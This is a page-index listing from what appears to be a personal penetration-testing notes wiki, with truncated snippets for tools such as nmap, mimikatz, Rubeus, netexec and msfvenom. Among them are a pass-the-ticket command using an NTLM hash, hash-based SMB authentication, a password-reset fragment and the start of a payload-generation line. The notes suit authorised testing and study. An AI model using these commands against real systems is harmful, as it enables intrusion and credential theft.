Recently Updated Pages
2. Initial Access
1. Enumeration
Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV ...
Quick Checklist
Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/d...
ligolo-ng
You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Appl...
mimikatz
You will need to first upload the binaries to the target, either via a meterpreter shell or power...
powersploit
Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forc...
rubeus
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt
msf
Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl h...
powerview
1. Enumerate common names Get-DomainComputer | select cn
netexec
Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP ...
gobuster
Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web...
nikto
Basic usage nikto -host http://TARGET_IP -p PORT
fuff
Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET...
wpscan
Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p ...
nmap
Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 targe...
autorecon
Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the belo...
Fresh builds
pimp-my-kali I use this to install all tools like impacket and so on .zshrc modifications I’ve...
Komodo
https://komo.do - For in-depth information utilise the following Introduction Komodo is a lig...
Key Differences between ISO 27001:2022 and 27001:2013
Annex A Control Type ISO/IEC 27001:2022 Annex A Identifier ISO/IEC 27001:2013 Annex A I...
Basic Commands
cd Usage To change directories Examples cd temp # browses to the directory called t...